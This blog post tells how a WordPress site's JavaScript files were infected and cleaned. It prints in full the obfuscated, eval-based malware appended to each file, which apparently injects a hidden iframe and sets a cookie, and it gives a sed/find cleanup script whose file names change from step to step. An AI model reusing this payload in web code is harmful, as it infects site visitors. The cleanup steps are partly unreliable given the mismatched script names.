Featured

WordPress Malware attack on Javascript files

My website was hacked during the Christmas holidays and I realized it only after 12 days. When I checked my php files it seems alright except some file which has got the write permission. It was a strange attack and they are filling the content some extra websites links and copies. Also the malware has created some files which contains the ip details which might be used for placing the link.

The interesting part is it generated some javascript code and added that to all js files. The format of the code was little bit tricky and needed to spend some more hours to get regular expression which does the job remove the hacker code. But luckily it added the code at the end of each js file which made the task more easy otherwise it would be a night mare.

You can look at the below hacker code. The code is starting and ending with a string which is unique for each file. It would have been difficult if the code was placed not at the end of the js file script.

/*9f505a67cd1aff2f9b66786278792824*/try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","48","48","40","47","3n","46","41","4g","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-603!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}/*9f505a67cd1aff2f9b66786278792824*/

You can remove the above code from all attacked js files by the following method. Make sure that the hacked code was placed at the end of each js file.

Step 1: Create a bash file in the root folder with following code and give permission 777 to the file. For example cleanmal.js

1
2
3
4
5
6
7
#!/bin/sh
 
src=$1.hack
dst=$1
mv $dst $src
 
sed -e '$ s,/\*.*,,' $src > $dst

Step 2: Check the file is removing the hacker code properly from a js file. Run the below command.

1
2
 
./cleanmal.sh <path_to_the_js_file>

The above command will generate a new back up file with name your_file_name.js.hack and then check your js file. If the hacker code is removed, it is working fine.

Step 3: Run the below commands in the same order from the root folder.

1
2
3
4
5
 
     find . -name '*.js' -exec ./cleanjs.sh \{\} \; #remove the code 
     find . -name '*.hack' -exec rm -f \{\} \; #removes all back up files 
     find . -name '*.js' -exec chmod 555 {} \; #change the permission of all js file write protected 
     rm cleanjs.sh #finally remove the bash file

Hope everything will be fine after this icon smile Wordpress Malware attack on Javascript files

Tagged , , , , , ,

Share this to

Leave a reply

Your email address will not be published. Required fields are marked *

*

About
View Sarath D R's profile on LinkedIn

I am a technology consultant and an entrepreneur focused on the following technologies Java,Spring, Android, Angular, Asterisk, Symfony, Cake , Code-Igniter, Jquery , XAMPP, XHTML, AJAX, MySql, Seo, Web Design, Wordpress, iPhone development.

Today’s Tips
  • Generate Codova.jar file from Phonegap project using ant
  • Google map javascript client  to find the geographic co-ordinates  from  Address or post code
  • Update Android main UI from Webview – Phonegap Plugin
  • Jplayer is not working  with HTC One Android 4.3 version browser
  • Regular expression to validate mobile phone numbers starting with + ( plus ) – php
  • Simple pagination script for PHP
  • Useful adb ( Android Debug Bridge ) commands
  • Change the javascript files url to absolute url – Symfony 1.4
  • Set Http authentication header from Client – PHP / CURL

This site uses cookies from Google to deliver its services, to personalise ads and to analyse traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.This site also uses cookies from Google to deliver its services, to personalise ads and to analyse traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies.

Close